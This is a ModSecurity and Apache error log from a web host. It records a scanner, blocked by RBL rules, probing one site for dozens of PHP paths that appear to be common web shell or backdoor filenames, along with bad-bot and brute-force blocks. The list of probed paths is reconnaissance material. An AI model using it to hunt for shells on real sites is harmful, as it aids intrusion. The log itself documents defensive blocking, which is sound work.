[Tue May 26 13:12:03.208842 2026] [security2:error] [pid 496740:tid 496818] [remote 14.161.17.36:50814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVOy-vOeft4ltnLrH41yAAAJU0"]
[Tue May 26 13:12:03.326350 2026] [security2:error] [pid 496740:tid 496963] [client 20.151.117.104:35527] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/files/index.php"] [unique_id "ahVOy-vOeft4ltnLrH412gAAAF0"]
[Tue May 26 13:12:03.326430 2026] [security2:error] [pid 496740:tid 496963] [client 20.151.117.104:35527] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/files/index.php"] [unique_id "ahVOy-vOeft4ltnLrH412gAAAF0"]
[Tue May 26 13:12:03.469958 2026] [security2:error] [pid 496740:tid 496955] [client 20.151.117.104:40679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/flower.php"] [unique_id "ahVOy-vOeft4ltnLrH413wAAAFU"]
[Tue May 26 13:12:03.470079 2026] [security2:error] [pid 496740:tid 496955] [client 20.151.117.104:40679] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/flower.php"] [unique_id "ahVOy-vOeft4ltnLrH413wAAAFU"]
[Tue May 26 13:12:03.612296 2026] [security2:error] [pid 496740:tid 496993] [client 20.151.117.104:46249] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/insc.php"] [unique_id "ahVOy-vOeft4ltnLrH416gAAAHs"]
[Tue May 26 13:12:03.612436 2026] [security2:error] [pid 496740:tid 496993] [client 20.151.117.104:46249] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/insc.php"] [unique_id "ahVOy-vOeft4ltnLrH416gAAAHs"]
[Tue May 26 13:12:03.697945 2026] [security2:error] [pid 496740:tid 496893] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOy-vOeft4ltnLrH411gAAABc"]
[Tue May 26 13:12:03.753929 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:19411] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/bgymj.php"] [unique_id "ahVOy-vOeft4ltnLrH418QAAADE"]
[Tue May 26 13:12:03.754021 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:19411] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/bgymj.php"] [unique_id "ahVOy-vOeft4ltnLrH418QAAADE"]
[Tue May 26 13:12:03.898195 2026] [security2:error] [pid 496740:tid 496967] [client 20.151.117.104:40648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/.dj/index.php"] [unique_id "ahVOy-vOeft4ltnLrH41-AAAAGE"]
[Tue May 26 13:12:03.898299 2026] [security2:error] [pid 496740:tid 496967] [client 20.151.117.104:40648] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/.dj/index.php"] [unique_id "ahVOy-vOeft4ltnLrH41-AAAAGE"]
[Tue May 26 13:12:04.043125 2026] [security2:error] [pid 496740:tid 496921] [client 20.151.117.104:40683] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/adminfuns.php"] [unique_id "ahVOzOvOeft4ltnLrH42AAAAADM"]
[Tue May 26 13:12:04.043234 2026] [security2:error] [pid 496740:tid 496921] [client 20.151.117.104:40683] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/adminfuns.php"] [unique_id "ahVOzOvOeft4ltnLrH42AAAAADM"]
[Tue May 26 13:12:04.187021 2026] [security2:error] [pid 496740:tid 496887] [client 20.151.117.104:35574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/011i.php"] [unique_id "ahVOzOvOeft4ltnLrH42BwAAABE"]
[Tue May 26 13:12:04.187129 2026] [security2:error] [pid 496740:tid 496887] [client 20.151.117.104:35574] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/011i.php"] [unique_id "ahVOzOvOeft4ltnLrH42BwAAABE"]
[Tue May 26 13:12:04.330372 2026] [security2:error] [pid 496740:tid 496920] [client 20.151.117.104:64793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/sid3.php"] [unique_id "ahVOzOvOeft4ltnLrH42CgAAADI"]
[Tue May 26 13:12:04.330501 2026] [security2:error] [pid 496740:tid 496920] [client 20.151.117.104:64793] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/sid3.php"] [unique_id "ahVOzOvOeft4ltnLrH42CgAAADI"]
[Tue May 26 13:12:04.465084 2026] [core:error] [pid 496740:tid 496948] [client 199.45.154.142:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:12:04.465102 2026] [core:error] [pid 496740:tid 496948] [client 199.45.154.142:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:12:04.472971 2026] [security2:error] [pid 496740:tid 496955] [client 20.151.117.104:27708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/166.php"] [unique_id "ahVOzOvOeft4ltnLrH42FQAAAFU"]
[Tue May 26 13:12:04.473051 2026] [security2:error] [pid 496740:tid 496955] [client 20.151.117.104:27708] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/166.php"] [unique_id "ahVOzOvOeft4ltnLrH42FQAAAFU"]
[Tue May 26 13:12:04.615684 2026] [security2:error] [pid 496740:tid 496956] [client 20.151.117.104:5442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/leaf.php"] [unique_id "ahVOzOvOeft4ltnLrH42GQAAAFY"]
[Tue May 26 13:12:04.615812 2026] [security2:error] [pid 496740:tid 496956] [client 20.151.117.104:5442] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/leaf.php"] [unique_id "ahVOzOvOeft4ltnLrH42GQAAAFY"]
[Tue May 26 13:12:04.764064 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:14309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/grsiuk.php"] [unique_id "ahVOzOvOeft4ltnLrH42JgAAADE"]
[Tue May 26 13:12:04.764143 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:14309] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/grsiuk.php"] [unique_id "ahVOzOvOeft4ltnLrH42JgAAADE"]
[Tue May 26 13:12:04.907551 2026] [security2:error] [pid 496740:tid 496953] [client 20.151.117.104:44964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/8.php"] [unique_id "ahVOzOvOeft4ltnLrH42JwAAAFM"]
[Tue May 26 13:12:04.907726 2026] [security2:error] [pid 496740:tid 496953] [client 20.151.117.104:44964] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/8.php"] [unique_id "ahVOzOvOeft4ltnLrH42JwAAAFM"]
[Tue May 26 13:12:05.050337 2026] [security2:error] [pid 496740:tid 496950] [client 20.151.117.104:42098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/fs.php"] [unique_id "ahVOzevOeft4ltnLrH42KwAAAFA"]
[Tue May 26 13:12:05.050432 2026] [security2:error] [pid 496740:tid 496950] [client 20.151.117.104:42098] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/fs.php"] [unique_id "ahVOzevOeft4ltnLrH42KwAAAFA"]
[Tue May 26 13:12:05.192473 2026] [security2:error] [pid 496740:tid 496989] [client 20.151.117.104:21677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ws38.php"] [unique_id "ahVOzevOeft4ltnLrH42NQAAAHc"]
[Tue May 26 13:12:05.192562 2026] [security2:error] [pid 496740:tid 496989] [client 20.151.117.104:21677] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ws38.php"] [unique_id "ahVOzevOeft4ltnLrH42NQAAAHc"]
[Tue May 26 13:12:05.307703 2026] [security2:error] [pid 496740:tid 496970] [client 74.7.244.32:42024] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahVOzevOeft4ltnLrH42PgAAZAo"]
[Tue May 26 13:12:05.334649 2026] [security2:error] [pid 496740:tid 496883] [client 20.151.117.104:12012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/classsmtps.php"] [unique_id "ahVOzevOeft4ltnLrH42RAAAAA0"]
[Tue May 26 13:12:05.334757 2026] [security2:error] [pid 496740:tid 496883] [client 20.151.117.104:12012] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/classsmtps.php"] [unique_id "ahVOzevOeft4ltnLrH42RAAAAA0"]
[Tue May 26 13:12:05.477193 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:59267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/amax.php"] [unique_id "ahVOzevOeft4ltnLrH42RQAAADg"]
[Tue May 26 13:12:05.477305 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:59267] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/amax.php"] [unique_id "ahVOzevOeft4ltnLrH42RQAAADg"]
[Tue May 26 13:12:05.620455 2026] [security2:error] [pid 496740:tid 496945] [client 20.151.117.104:39949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/sadcut1.php"] [unique_id "ahVOzevOeft4ltnLrH42SQAAAEs"]
[Tue May 26 13:12:05.620538 2026] [security2:error] [pid 496740:tid 496945] [client 20.151.117.104:39949] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/sadcut1.php"] [unique_id "ahVOzevOeft4ltnLrH42SQAAAEs"]
[Tue May 26 13:12:05.767941 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:28901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/y.php"] [unique_id "ahVOzevOeft4ltnLrH42UwAAADw"]
[Tue May 26 13:12:05.768035 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:28901] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/y.php"] [unique_id "ahVOzevOeft4ltnLrH42UwAAADw"]
[Tue May 26 13:12:05.913804 2026] [security2:error] [pid 496740:tid 496882] [client 20.151.117.104:6708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/7.php"] [unique_id "ahVOzevOeft4ltnLrH42XQAAAAw"]
[Tue May 26 13:12:05.913966 2026] [security2:error] [pid 496740:tid 496882] [client 20.151.117.104:6708] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/7.php"] [unique_id "ahVOzevOeft4ltnLrH42XQAAAAw"]
[Tue May 26 13:12:06.056310 2026] [security2:error] [pid 496740:tid 496932] [client 20.151.117.104:35522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/a5.php"] [unique_id "ahVOzuvOeft4ltnLrH42YQAAAD4"]
[Tue May 26 13:12:06.056449 2026] [security2:error] [pid 496740:tid 496932] [client 20.151.117.104:35522] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/a5.php"] [unique_id "ahVOzuvOeft4ltnLrH42YQAAAD4"]
[Tue May 26 13:12:06.207417 2026] [security2:error] [pid 496740:tid 496875] [client 20.151.117.104:27693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/vx.php"] [unique_id "ahVOzuvOeft4ltnLrH42aAAAAAU"]
[Tue May 26 13:12:06.207531 2026] [security2:error] [pid 496740:tid 496875] [client 20.151.117.104:27693] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/vx.php"] [unique_id "ahVOzuvOeft4ltnLrH42aAAAAAU"]
[Tue May 26 13:12:06.208975 2026] [security2:error] [pid 496740:tid 496956] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOzevOeft4ltnLrH42VgAAAFY"]
[Tue May 26 13:12:06.356515 2026] [security2:error] [pid 496740:tid 496931] [client 20.151.117.104:40693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/asd.php"] [unique_id "ahVOzuvOeft4ltnLrH42cAAAAD0"]
[Tue May 26 13:12:06.356635 2026] [security2:error] [pid 496740:tid 496931] [client 20.151.117.104:40693] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/asd.php"] [unique_id "ahVOzuvOeft4ltnLrH42cAAAAD0"]
[Tue May 26 13:12:06.500236 2026] [security2:error] [pid 496740:tid 496914] [client 20.151.117.104:11971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/default.php"] [unique_id "ahVOzuvOeft4ltnLrH42dgAAACw"]
[Tue May 26 13:12:06.500334 2026] [security2:error] [pid 496740:tid 496914] [client 20.151.117.104:11971] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/default.php"] [unique_id "ahVOzuvOeft4ltnLrH42dgAAACw"]
[Tue May 26 13:12:06.643254 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:37160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gettest.php"] [unique_id "ahVOzuvOeft4ltnLrH42egAAADg"]
[Tue May 26 13:12:06.643356 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:37160] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/gettest.php"] [unique_id "ahVOzuvOeft4ltnLrH42egAAADg"]
[Tue May 26 13:12:06.785595 2026] [security2:error] [pid 496740:tid 496888] [client 20.151.117.104:21677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/tfm.php"] [unique_id "ahVOzuvOeft4ltnLrH42gQAAABI"]
[Tue May 26 13:12:06.785732 2026] [security2:error] [pid 496740:tid 496888] [client 20.151.117.104:21677] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/tfm.php"] [unique_id "ahVOzuvOeft4ltnLrH42gQAAABI"]
[Tue May 26 13:12:06.935662 2026] [security2:error] [pid 496740:tid 496923] [client 20.151.117.104:21458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/t.php"] [unique_id "ahVOzuvOeft4ltnLrH42iAAAADU"]
[Tue May 26 13:12:06.935767 2026] [security2:error] [pid 496740:tid 496923] [client 20.151.117.104:21458] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/t.php"] [unique_id "ahVOzuvOeft4ltnLrH42iAAAADU"]
[Tue May 26 13:12:07.078239 2026] [security2:error] [pid 496740:tid 496993] [client 20.151.117.104:21446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/maint/index.php"] [unique_id "ahVOz-vOeft4ltnLrH42jAAAAHs"]
[Tue May 26 13:12:07.078346 2026] [security2:error] [pid 496740:tid 496993] [client 20.151.117.104:21446] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/maint/index.php"] [unique_id "ahVOz-vOeft4ltnLrH42jAAAAHs"]
[Tue May 26 13:12:07.226398 2026] [security2:error] [pid 496740:tid 496947] [client 20.151.117.104:16175] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/6xBAm3vODE05BSzkJZRAws.php"] [unique_id "ahVOz-vOeft4ltnLrH42kAAAAE0"]
[Tue May 26 13:12:07.226526 2026] [security2:error] [pid 496740:tid 496947] [client 20.151.117.104:16175] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/6xBAm3vODE05BSzkJZRAws.php"] [unique_id "ahVOz-vOeft4ltnLrH42kAAAAE0"]
[Tue May 26 13:12:07.369307 2026] [security2:error] [pid 496740:tid 496946] [client 20.151.117.104:42094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/onclickfuns.php"] [unique_id "ahVOz-vOeft4ltnLrH42nwAAAEw"]
[Tue May 26 13:12:07.369402 2026] [security2:error] [pid 496740:tid 496946] [client 20.151.117.104:42094] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/onclickfuns.php"] [unique_id "ahVOz-vOeft4ltnLrH42nwAAAEw"]
[Tue May 26 13:12:07.517935 2026] [security2:error] [pid 496740:tid 496964] [client 20.151.117.104:37146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/maint/about.php"] [unique_id "ahVOz-vOeft4ltnLrH42pwAAAF4"]
